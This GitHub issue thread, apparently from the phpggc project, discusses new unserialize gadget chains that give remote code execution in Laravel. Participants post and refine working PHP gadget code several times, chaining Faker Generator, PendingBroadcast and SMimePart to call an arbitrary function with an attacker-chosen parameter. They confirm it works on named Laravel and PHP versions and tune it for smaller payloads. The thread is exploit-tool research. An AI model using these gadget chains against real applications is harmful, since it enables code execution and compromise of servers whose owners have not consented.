-
Notifications
You must be signed in to change notification settings - Fork 488
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
New pop chains for Laravel 9.12.2 #118
Comments
Looks like the original author has submitted a PR in #119 |
Hello GlitchWitch, Added the one you referenced. @1nhann, any plans to push the three others ? Charles |
Hello @cfreal, |
Hello, A quick solution for that could be to use the Tested and worked. (As Laravel/RCE11) Good luck. |
Thanks , added . #126 |
Hi everybody, I finally had the time to process this ticket. Cool idea. class X {
public $a;
public $b;
function __construct()
{
$this->a = 3;
$this->b = &$this->a;
}
}
print serialize(new X());
# O:1:"X":2:{s:1:"a";i:3;s:1:"b";R:2;} This is even more portable because we can now integrate the gadgetchain in a bigger payload, and the reference number will still be correct. I will update the submitted Laravel/RCE11 GC to reflect this ! Charles |
Hello, Thanks @cfreal, I tried to use references weeks ago, but I failed because of a mistake in my code. I updated the rest of the code with your gadget. I can provide some suggestions: Abstraction has no effect in serialization process, so we can remove it, and this will allow us to instantiate "AbstractPart" class and to use its constructor and will not need to define a new method ("createBroadcast"). I mean: gadget.php <?php
namespace Faker
{
class Generator
{
protected $providers = [];
protected $formatters = [];
function __construct(&$formatters)
{
$this->formatter = "dispatch";
$this->formatters = &$formatters;
}
}
}
namespace Illuminate\Broadcasting
{
class PendingBroadcast
{
public function __construct(&$formatters, $parameter)
{
$this->event = $parameter;
$this->events = new \Faker\Generator($formatters);
}
}
}
namespace Symfony\Component\Mime\Part
{
class AbstractPart
{
private $headers = null;
public function __construct($parameter)
{
return new \Illuminate\Broadcasting\PendingBroadcast($this->headers, $parameter);
}
}
class SMimePart extends AbstractPart
{
protected $_headers;
public $inhann;
function __construct($function, $parameter)
{
$this->_headers = ["dispatch" => $function];
$this->inhann = parent::__construct($parameter);
}
}
} Or even better: (By removing "AbstractPart" class and using "$headers" property in "SMimePart" class. This one generates ~16% smaller payloads. Tested and worked v9.3.8,v9.35.1.) <?php
namespace Faker
{
class Generator
{
protected $formatters = [];
function __construct(&$formatters)
{
$this->formatters = &$formatters;
}
}
}
namespace Illuminate\Broadcasting
{
class PendingBroadcast
{
public function __construct(&$formatters, $parameter)
{
$this->event = $parameter;
$this->events = new \Faker\Generator($formatters);
}
}
}
namespace Symfony\Component\Mime\Part
{
class SMimePart
{
protected $_headers;
public $inhann;
private $headers = null;
function __construct($function, $parameter)
{
$this->_headers = ["dispatch" => $function];
$this->inhann = new \Illuminate\Broadcasting\PendingBroadcast($this->headers, $parameter);
}
}
} Thank you. |
Hello @mir-hossein, although I like the idea of reducing payload size, your second statement is incorrect. <?php
class A {
private $x = 3;
function __construct($x) {
$this->x = $x;
}
public function display() {
print "x is $this->x\n";
}
}
class B extends A {
}
$s = serialize(new B(4));
$z = str_replace("\x00A\x00", "\x00B\x00", $s);
$u = unserialize($z);
$u->display(); Let's run this with different PHP versions:
|
Hello @cfreal, Thanks for your explanation. Sorry, I had tested it only in PHP 8.1, Laravel 9.3.8, Framework 9.35.1. You are right. lol2.php <?php
class A {
private $x = 3;
function __construct($x) {
$this->x = $x;
}
public function display() {
print "x is $this->x\n";
}
}
class B extends A {
}
$s = serialize(new B(4));
$z = str_replace("\x00A\x00", "\x00B\x00", $s);
var_dump(unserialize($z)); Results:
I didn't test the Object deserialization result in older PHP versions. lol3.php <?php
class A
{
private $x = 3;
public function display()
{
print "x is $this->x\n";
}
}
class B extends A
{
public function __construct($x)
{
$this->x = $x;
}
}
$s = serialize(new B(4));
$z = str_replace("\x00A\x00", "\x00B\x00", $s);
var_dump(unserialize($z)); Results:
Only works in PHP 8.1. :(New suggestion: this one generates ~15% smaller payloads :) gadget.php <?php
namespace Faker
{
class Generator
{
protected $formatters = [];
function __construct(&$formatters)
{
$this->formatters = &$formatters;
}
}
}
namespace Illuminate\Broadcasting
{
class PendingBroadcast
{
public function __construct(&$formatters, $parameter)
{
$this->event = $parameter;
$this->events = new \Faker\Generator($formatters);
}
}
}
namespace Symfony\Component\Mime\Part
{
class AbstractPart
{
private $headers = null;
public function __construct($parameter)
{
return new \Illuminate\Broadcasting\PendingBroadcast($this->headers, $parameter);
}
}
class SMimePart extends AbstractPart
{
protected $_headers;
public $inhann;
function __construct($function, $parameter)
{
$this->_headers = ["dispatch" => $function];
$this->inhann = parent::__construct($parameter);
}
}
} Tested: PHP: 7.4.32, Laravel: 8.6.12, Framework: 8.83.25 |
I am considering making it an option at some point in the future: make every property public to save space and to get rid of null bytes (even though we could use |
Excellent idea👍. Every time I talk to you, I learn something new. Thanks @cfreal. |
Let's close this (for now). |
Looks like someone published 4 new exploits for Laravel via an unserialize pop chain in
__destruct
anddispatch($command).
. I tested them and confirmed they work.source:
1nhann/vulns#1
1nhann/vulns#2
1nhann/vulns#3
1nhann/vulns#4
Posting here since this may be of interest to implement into phpggc
The text was updated successfully, but these errors were encountered: